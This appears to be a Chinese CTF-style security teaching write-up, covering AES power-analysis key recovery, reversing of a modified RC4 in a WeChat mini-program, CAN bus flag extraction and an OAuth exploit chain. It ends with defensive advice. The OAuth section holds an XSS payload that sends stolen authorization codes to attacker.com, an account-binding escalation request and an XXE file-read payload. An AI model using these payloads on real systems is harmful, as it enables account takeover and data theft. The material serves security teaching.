侧信道攻击与物联网安全实战教学文档<\/h1>

1. AES侧信道攻击实战<\/h2>

1.1 背景与原理<\/h3>
侧信道攻击(Side-Channel Attack)<\/strong> 通过分析密码设备运行时的物理特性（如功耗、电磁辐射、执行时间等）来恢复密钥。本案例针对AES-128算法的硬件实现进行功耗分析。<\/p>
核心原理<\/strong>：AES第一轮SubBytes操作中，S盒查找操作 `SBox(PT[i]⊕k)<\/code> 的汉明重量与功耗存在线性关系。<\/p>`

1.2 数据集规格<\/h3> 文件格式<\/strong>：TRS (TraceSet)<\/li> 轨迹数量<\/strong>：10,000条<\/li> 每条样本数<\/strong>：500个采样点<\/li> 数据编码<\/strong>：每条记录包含32字节数据（16B明文 + 16B密文） + 500个功耗采样点<\/li> <\/ul> 1.3 攻击实施步骤<\/h3> 步骤1：TRS文件解析<\/h4> def<\/span> parse_trs_header<\/span>(file_path): <\/span><\/span> # 解析TRS文件头，获取轨迹数、样本数等元数据<\/span> <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>def<\/span> read_traces<\/span>(file_path, ntraces, nsamples): <\/span><\/span> # 逐条读取明文、密文和功耗采样数据<\/span> <\/span><\/span> traces =<\/span> [] <\/span><\/span> for<\/span> i in<\/span> range(ntraces): <\/span><\/span> # 读取32字节数据块<\/span> <\/span><\/span> data_block =<\/span> file.<\/span>read(32<\/span>) <\/span><\/span> plaintext =<\/span> data_block[:16<\/span>] <\/span><\/span> ciphertext =<\/span> data_block[16<\/span>:32<\/span>] <\/span><\/span> # 读取500个功耗采样点<\/span> <\/span><\/span> power_samples =<\/span> np.<\/span>fromfile(file, dtype=<\/span>np.<\/span>float32, count=<\/span>nsamples) <\/span><\/span> traces.<\/span>append((plaintext, ciphertext, power_samples)) <\/span><\/span> return<\/span> traces <\/span><\/span><\/code><\/pre>步骤2：数据预处理<\/h4> def<\/span> normalize_traces<\/span>(traces): <\/span><\/span> # 按列标准化：去均值，除标准差<\/span> <\/span><\/span> # traces形状: (ntraces, nsamples)<\/span> <\/span><\/span> mean =<\/span> np.<\/span>mean(traces, axis=<\/span>0<\/span>) <\/span><\/span> std =<\/span> np.<\/span>std(traces, axis=<\/span>0<\/span>) <\/span><\/span> normalized =<\/span> (traces -<\/span> mean) \/<\/span> std <\/span><\/span> return<\/span> normalized <\/span><\/span><\/code><\/pre>步骤3：泄漏模型构建<\/h4> 汉明重量模型<\/strong>：<\/p> H = HW(SBox(PT[i] ⊕ k)) <\/code><\/pre> 其中：<\/p> PT[i]<\/code>：明文的第i个字节<\/li> k<\/code>：密钥字节猜测值（0-255）<\/li> HW()<\/code>：汉明重量函数（计算字节中1的个数）<\/li> SBox()<\/code>：AES的S盒替换函数<\/li> <\/ul> 步骤4：相关功耗分析(CPA)<\/h4> def<\/span> cpa_attack<\/span>(plaintexts, traces, target_byte): <\/span><\/span> """ <\/span><\/span><\/span> 对特定字节位置进行CPA攻击 <\/span><\/span><\/span> """<\/span> <\/span><\/span> ntraces =<\/span> len(plaintexts) <\/span><\/span> nsamples =<\/span> traces.<\/span>shape[1<\/span>] <\/span><\/span> <\/span><\/span> best_correlations =<\/span> np.<\/span>zeros(256<\/span>) # 每个密钥猜测的最佳相关系数<\/span> <\/span><\/span> best_poi =<\/span> np.<\/span>zeros(256<\/span>, dtype=<\/span>int) # 对应的关键采样点<\/span> <\/span><\/span> <\/span><\/span> for<\/span> key_guess in<\/span> range(256<\/span>): <\/span><\/span> # 计算预测泄漏值<\/span> <\/span><\/span> hypothetical_leakage =<\/span> [] <\/span><\/span> for<\/span> i in<\/span> range(ntraces): <\/span><\/span> sbox_input =<\/span> plaintexts[i][target_byte] ^<\/span> key_guess <\/span><\/span> sbox_output =<\/span> aes_sbox[sbox_input] <\/span><\/span> hamming_weight =<\/span> bin(sbox_output).<\/span>count('1'<\/span>) # 汉明重量<\/span> <\/span><\/span> hypothetical_leakage.<\/span>append(hamming_weight) <\/span><\/span> <\/span><\/span> # 计算与每个采样点的相关系数<\/span> <\/span><\/span> correlations =<\/span> np.<\/span>zeros(nsamples) <\/span><\/span> for<\/span> sample_idx in<\/span> range(nsamples): <\/span><\/span> corr =<\/span> np.<\/span>corrcoef(hypothetical_leakage, traces[:, sample_idx])[0<\/span>,1<\/span>] <\/span><\/span> correlations[sample_idx] =<\/span> corr if<\/span> not<\/span> np.<\/span>isnan(corr) else<\/span> 0<\/span> <\/span><\/span> <\/span><\/span> # 记录最佳相关值和对应采样点<\/span> <\/span><\/span> best_corr_idx =<\/span> np.<\/span>argmax(np.<\/span>abs(correlations)) <\/span><\/span> best_correlations[key_guess] =<\/span> correlations[best_corr_idx] <\/span><\/span> best_poi[key_guess] =<\/span> best_corr_idx <\/span><\/span> <\/span><\/span> # 选择相关系数绝对值最大的密钥猜测<\/span> <\/span><\/span> recovered_key_byte =<\/span> np.<\/span>argmax(np.<\/span>abs(best_correlations)) <\/span><\/span> return<\/span> recovered_key_byte, best_poi[recovered_key_byte] <\/span><\/span><\/code><\/pre>步骤5：密钥恢复与验证<\/h4> def<\/span> recover_full_key<\/span>(plaintexts, traces): <\/span><\/span> key =<\/span> bytearray(16<\/span>) <\/span><\/span> for<\/span> byte_idx in<\/span> range(16<\/span>): <\/span><\/span> key_byte, poi =<\/span> cpa_attack(plaintexts, traces, byte_idx) <\/span><\/span> key[byte_idx] =<\/span> key_byte <\/span><\/span> print(f<\/span>"Byte <\/span>{<\/span>byte_idx}<\/span>: 0x<\/span>{<\/span>key_byte:<\/span>02x<\/span>}<\/span> (POI: <\/span>{<\/span>poi}<\/span>)"<\/span>) <\/span><\/span> return<\/span> bytes(key) <\/span><\/span> <\/span><\/span>def<\/span> verify_key<\/span>(plaintexts, ciphertexts, recovered_key): <\/span><\/span> # 使用标准AES验证多条样本<\/span> <\/span><\/span> aes =<\/span> AES.<\/span>new(recovered_key, AES.<\/span>MODE_ECB) <\/span><\/span> for<\/span> i in<\/span> range(min(50<\/span>, len(plaintexts))): <\/span><\/span> encrypted =<\/span> aes.<\/span>encrypt(plaintexts[i]) <\/span><\/span> if<\/span> encrypted !=<\/span> ciphertexts[i]: <\/span><\/span> return<\/span> False<\/span> <\/span><\/span> return<\/span> True<\/span> <\/span><\/span><\/code><\/pre>1.4 实验结果<\/h3> 恢复的AES-128主密钥<\/strong>：CCAEEED667CD6C04C7ABCCC26DC793F1<\/code><\/li> 最后一轮轮密钥<\/strong>：FAB3F9784AF8FFA45036A473539D04C6<\/code><\/li> 验证结果<\/strong>：50条样本全部通过验证<\/li> <\/ul> 1.5 关键要点<\/h3> 泄漏点识别<\/strong>：第一轮SubBytes操作是最佳攻击点<\/li> 数据标准化<\/strong>：提高信噪比，增强相关性<\/li> 批量处理<\/strong>：使用矩阵运算替代循环，显著提升效率<\/li> 多样本验证<\/strong>：确保密钥正确性<\/li> <\/ol> 2. 微信小程序逆向与RC4密码分析<\/h2> 2.1 逆向分析流程<\/h3> 步骤1：小程序结构分析<\/h4> 微信小程序未加密情况下可直接分析关键文件：<\/p> .wxapkg<\/code>解包获取源码<\/li> 定位加密相关函数<\/li> <\/ul> 步骤2：RC4变种算法识别<\/h4> \/\/ 识别出的RC4变种特征 <\/span><\/span><\/span><\/span>function<\/span> rc4_modified<\/span>(key<\/span>, data<\/span>) { <\/span><\/span> var<\/span> s<\/span> =<\/span> [], k<\/span> =<\/span> []; <\/span><\/span> \/\/ KSA阶段：包含额外常数+3 <\/span><\/span><\/span><\/span> for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 256<\/span>; i<\/span>++<\/span>) { <\/span><\/span> s<\/span>[i<\/span>] =<\/span> i<\/span>; <\/span><\/span> k<\/span>[i<\/span>] =<\/span> key<\/span>.charCodeAt<\/span>(i<\/span> %<\/span> key<\/span>.length<\/span>); <\/span><\/span> } <\/span><\/span> var<\/span> j<\/span> =<\/span> 0<\/span>; <\/span><\/span> for<\/span> (var<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> 256<\/span>; i<\/span>++<\/span>) { <\/span><\/span> j<\/span> =<\/span> (j<\/span> +<\/span> s<\/span>[i<\/span>] +<\/span> k<\/span>[i<\/span> %<\/span> key<\/span>.length<\/span>] +<\/span> 3<\/span>) %<\/span> 256<\/span>; \/\/ 修改点：+3 <\/span><\/span><\/span><\/span> [s<\/span>[i<\/span>], s<\/span>[j<\/span>]] =<\/span> [s<\/span>[j<\/span>], s<\/span>[i<\/span>]]; \/\/ 交换 <\/span><\/span><\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ PRGA阶段 <\/span><\/span><\/span><\/span> var<\/span> i<\/span> =<\/span> 0<\/span>, j<\/span> =<\/span> 0<\/span>, result<\/span> =<\/span> []; <\/span><\/span> for<\/span> (var<\/span> n<\/span> =<\/span> 0<\/span>; n<\/span> <<\/span> data<\/span>.length<\/span>; n<\/span>++<\/span>) { <\/span><\/span> i<\/span> =<\/span> (i<\/span> +<\/span> 1<\/span>) %<\/span> 256<\/span>; <\/span><\/span> j<\/span> =<\/span> (j<\/span> +<\/span> s<\/span>[i<\/span>]) %<\/span> 256<\/span>; <\/span><\/span> [s<\/span>[i<\/span>], s<\/span>[j<\/span>]] =<\/span> [s<\/span>[j<\/span>], s<\/span>[i<\/span>]]; <\/span><\/span> var<\/span> t<\/span> =<\/span> (s<\/span>[i<\/span>] +<\/span> s<\/span>[j<\/span>]) %<\/span> 256<\/span>; <\/span><\/span> var<\/span> keystream<\/span> =<\/span> s<\/span>[t<\/span>] &<\/span> 0xFF<\/span>; \/\/ 取低8位 <\/span><\/span><\/span><\/span> result<\/span>.push<\/span>(data<\/span>[n<\/span>] ^<\/span> keystream<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> result<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>步骤3：已知明文攻击实施<\/h4> def<\/span> rc4_decrypt_modified<\/span>(key, ciphertext_hex): <\/span><\/span> # 密钥固定为"Z1X3Y4E5Z8V2A6H6"<\/span> <\/span><\/span> ciphertext =<\/span> bytes.<\/span>fromhex(ciphertext_hex) <\/span><\/span> <\/span><\/span> # 实现修改版的RC4 KSA<\/span> <\/span><\/span> s =<\/span> list(range(256<\/span>)) <\/span><\/span> j =<\/span> 0<\/span> <\/span><\/span> key_bytes =<\/span> key.<\/span>encode('utf-8'<\/span>) <\/span><\/span> key_length =<\/span> len(key_bytes) <\/span><\/span> <\/span><\/span> # 修改的KSA<\/span> <\/span><\/span> for<\/span> i in<\/span> range(256<\/span>): <\/span><\/span> j =<\/span> (j +<\/span> s[i] +<\/span> key_bytes[i %<\/span> key_length] +<\/span> 3<\/span>) %<\/span> 256<\/span> <\/span><\/span> s[i], s[j] =<\/span> s[j], s[i] <\/span><\/span> <\/span><\/span> # PRGA<\/span> <\/span><\/span> i =<\/span> j =<\/span> 0<\/span> <\/span><\/span> plaintext =<\/span> [] <\/span><\/span> for<\/span> byte in<\/span> ciphertext: <\/span><\/span> i =<\/span> (i +<\/span> 1<\/span>) %<\/span> 256<\/span> <\/span><\/span> j =<\/span> (j +<\/span> s[i]) %<\/span> 256<\/span> <\/span><\/span> s[i], s[j] =<\/span> s[j], s[i] <\/span><\/span> t =<\/span> (s[i] +<\/span> s[j]) %<\/span> 256<\/span> <\/span><\/span> keystream =<\/span> s[t] &<\/span> 0xFF<\/span> <\/span><\/span> plaintext.<\/span>append(byte ^<\/span> keystream) <\/span><\/span> <\/span><\/span> return<\/span> bytes(plaintext) <\/span><\/span> <\/span><\/span># 解密得到VIN和flag<\/span> <\/span><\/span>correct_encrypted =<\/span> "..."<\/span> # 16进制密文<\/span> <\/span><\/span>key =<\/span> "Z1X3Y4E5Z8V2A6H6"<\/span> <\/span><\/span>decrypted =<\/span> rc4_decrypt_modified(key, correct_encrypted) <\/span><\/span>print(f<\/span>"Flag: FLAG<\/span>{{<\/span>{<\/span>decrypted.<\/span>hex().<\/span>upper()}<\/span>}}<\/span>"<\/span>) # FLAG{L0J6Q0P7H3E2I5U6H}<\/span> <\/span><\/span><\/code><\/pre>3. CAN总线信号分析与Flag提取<\/h2> 3.1 CAN信号映射表解析<\/h3> 信号映射表结构<\/strong>（signal_map.csv）：<\/p> 信号名称, CAN ID, 字节位置, 数据类型 sig_1, 0x123, 0, uint8 sig_2, 0x123, 1, uint8 ... sig_72, 0x456, 7, uint8 <\/code><\/pre> 3.2 信号分类策略<\/h3> sig_1-sig_19<\/strong>：第一类信号类型<\/li> sig_20-sig_39<\/strong>：第二类信号类型<\/li> sig_40-sig_59<\/strong>：第三类信号类型<\/li> sig_60-sig_72<\/strong>：第四类信号类型<\/li> <\/ul> 3.3 Flag提取算法<\/h3> import<\/span> pandas as<\/span> pd <\/span><\/span>from<\/span> collections import<\/span> Counter <\/span><\/span> <\/span><\/span>def<\/span> extract_can_signals<\/span>(can_log_path, signal_map_path): <\/span><\/span> # 读取信号映射表<\/span> <\/span><\/span> signal_map =<\/span> pd.<\/span>read_csv(signal_map_path) <\/span><\/span> <\/span><\/span> # 解析CAN日志<\/span> <\/span><\/span> can_data =<\/span> parse_can_log(can_log_path) <\/span><\/span> <\/span><\/span> # 按信号分类提取最后传输的值<\/span> <\/span><\/span> flag_chars =<\/span> {} <\/span><\/span> for<\/span> sig_type in<\/span> ['sig_1-19'<\/span>, 'sig_20-39'<\/span>, 'sig_40-59'<\/span>, 'sig_60-72'<\/span>]: <\/span><\/span> if<\/span> sig_type ==<\/span> 'sig_1-19'<\/span>: <\/span><\/span> signals =<\/span> [f<\/span>'sig_<\/span>{<\/span>i}<\/span>'<\/span> for<\/span> i in<\/span> range(1<\/span>, 20<\/span>)] <\/span><\/span> # 其他类型类似处理...<\/span> <\/span><\/span> <\/span><\/span> for<\/span> sig_name in<\/span> signals: <\/span><\/span> # 获取该信号的CAN ID和字节位置<\/span> <\/span><\/span> can_id =<\/span> signal_map[signal_map['signal'<\/span>] ==<\/span> sig_name]['can_id'<\/span>].<\/span>iloc[0<\/span>] <\/span><\/span> byte_pos =<\/span> signal_map[signal_map['signal'<\/span>] ==<\/span> sig_name]['byte'<\/span>].<\/span>iloc[0<\/span>] <\/span><\/span> <\/span><\/span> # 提取该信号最后传输的值<\/span> <\/span><\/span> last_value =<\/span> extract_last_signal_value(can_data, can_id, byte_pos) <\/span><\/span> <\/span><\/span> # 转换为ASCII字符<\/span> <\/span><\/span> if<\/span> 32<\/span> <=<\/span> last_value <=<\/span> 126<\/span>: # 可打印字符<\/span> <\/span><\/span> flag_chars[sig_name] =<\/span> chr(last_value) <\/span><\/span> <\/span><\/span> # 按信号顺序拼接Flag<\/span> <\/span><\/span> flag =<\/span> 'flag{'<\/span> <\/span><\/span> for<\/span> i in<\/span> range(1<\/span>, 73<\/span>): <\/span><\/span> sig_name =<\/span> f<\/span>'sig_<\/span>{<\/span>i}<\/span>'<\/span> <\/span><\/span> if<\/span> sig_name in<\/span> flag_chars: <\/span><\/span> flag +=<\/span> flag_chars[sig_name] <\/span><\/span> flag +=<\/span> '}'<\/span> <\/span><\/span> <\/span><\/span> return<\/span> flag <\/span><\/span> <\/span><\/span># 提取结果：flag{V3h1cle_N3tw0rk1ng_53cu71ty}<\/span> <\/span><\/span><\/code><\/pre>4. OAuth 2.0安全漏洞利用链<\/h2> 4.1 漏洞链概述<\/h3> 存储型XSS<\/strong> → 2. OAuth授权码窃取<\/strong> → 3. 权限提升<\/strong> → 4. XXE文件读取<\/strong><\/li> <\/ol> 4.2 详细攻击步骤<\/h3> 阶段1：XSS Payload构造<\/h4> <\/span> <\/span><\/span><script<\/span>> <\/span><\/span>window.addEventListener<\/span>('message'<\/span>, function<\/span>(event<\/span>) { <\/span><\/span> \/\/ 监听iframe发送的postMessage <\/span><\/span><\/span><\/span> var<\/span> url<\/span> =<\/span> new<\/span> URL<\/span>(event<\/span>.data<\/span>.url<\/span>); <\/span><\/span> var<\/span> code<\/span> =<\/span> url<\/span>.searchParams<\/span>.get<\/span>('code'<\/span>); <\/span><\/span> <\/span><\/span> if<\/span> (code<\/span>) { <\/span><\/span> \/\/ 将授权码外传到攻击者服务器 <\/span><\/span><\/span><\/span> var<\/span> img<\/span> =<\/span> new<\/span> Image<\/span>(); <\/span><\/span> img<\/span>.src<\/span> =<\/span> 'https:\/\/attacker.com\/steal?code='<\/span> +<\/span> code<\/span>; <\/span><\/span> } <\/span><\/span>}); <\/span><\/span> <\/span><\/span>\/\/ 触发OAuth流程 <\/span><\/span><\/span><\/span>setTimeout<\/span>(function<\/span>() { <\/span><\/span> var<\/span> oauthUrl<\/span> =<\/span> 'https:\/\/sso.autocorp.com\/oauth\/authorize?'<\/span> +<\/span> <\/span><\/span> 'response_type=code&'<\/span> +<\/span> <\/span><\/span> 'client_id=fleetcorp&'<\/span> +<\/span> <\/span><\/span> 'redirect_uri='<\/span> +<\/span> encodeURIComponent('https:\/\/fleetcorp.com\/forum\/quick-actions'<\/span>) +<\/span> <\/span><\/span> '&scope=openid%20profile'<\/span>; <\/span><\/span> window.open<\/span>(oauthUrl<\/span>); <\/span><\/span>}, 1000<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>阶段2：权限提升API调用<\/h4> POST<\/span> \/fleetcorp\/api\/v1\/user\/sso\/bind HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span>Authorization:<\/span> Bearer <attacker_token><\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "code"<\/span>: "<stolen_authorization_code>"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>API响应<\/strong>：<\/p> { <\/span><\/span> "success"<\/span>: true<\/span>, <\/span><\/span> "message"<\/span>: "SSO account bound successfully"<\/span>, <\/span><\/span> "role"<\/span>: "ADMIN"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>阶段3：XXE Payload构造<\/h4> <\/span> <\/span><\/span><?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE report [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "file:\/\/\/flag"><\/span> <\/span><\/span>]> <\/span><\/span><vehicleReport><\/span> <\/span><\/span> <vin><\/span>&xxe;<\/vin><\/span> <\/span><\/span> <make><\/span>Test<\/make><\/span> <\/span><\/span> <model><\/span>Test<\/model><\/span> <\/span><\/span> <year><\/span>2024<\/year><\/span> <\/span><\/span><\/vehicleReport><\/span> <\/span><\/span><\/code><\/pre>4.3 服务架构分析<\/h3> Nginx (端口80) ├── FleetCorp App (端口3001) - 主应用 ├── AutoCorp Auth (端口5001) - OAuth提供者 └── Report Generator (端口8081) - XML报告生成 <\/code><\/pre> 5. 安全防护建议<\/h2> 5.1 侧信道攻击防护<\/h3> 掩码技术<\/strong>：对中间值添加随机掩码<\/li> 时间随机化<\/strong>：引入随机延迟打乱时序<\/li> 功耗平衡<\/strong>：设计恒定功耗的逻辑电路<\/li> <\/ol> 5.2 密码实现安全<\/h3> 避免自定义密码算法<\/strong>：使用标准经过验证的实现<\/li> 密钥管理<\/strong>：安全的密钥存储和轮换机制<\/li> 代码混淆<\/strong>：对敏感算法进行混淆保护<\/li> <\/ol> 5.3 Web应用安全<\/h3> 输入验证<\/strong>：对所有用户输入进行严格过滤<\/li> Content Security Policy<\/strong>：限制脚本执行来源<\/li> OAuth安全配置<\/strong>：严格验证redirect_uri<\/li> 使用state参数防止CSRF<\/li> 限制授权码生命周期<\/li> <\/ul> <\/li> <\/ol> 5.4 车载网络安全<\/h3> CAN总线加密<\/strong>：对敏感信号进行加密传输<\/li> 信号认证<\/strong>：使用MAC确保信号完整性<\/li> 网络隔离<\/strong>：关键ECU与信息娱乐系统物理隔离<\/li> <\/ol> 本教学文档涵盖了从硬件侧信道攻击到Web应用安全的多层次安全技术，提供了完整的实战案例和防护方案，可作为物联网安全研究的综合参考资料。<\/p>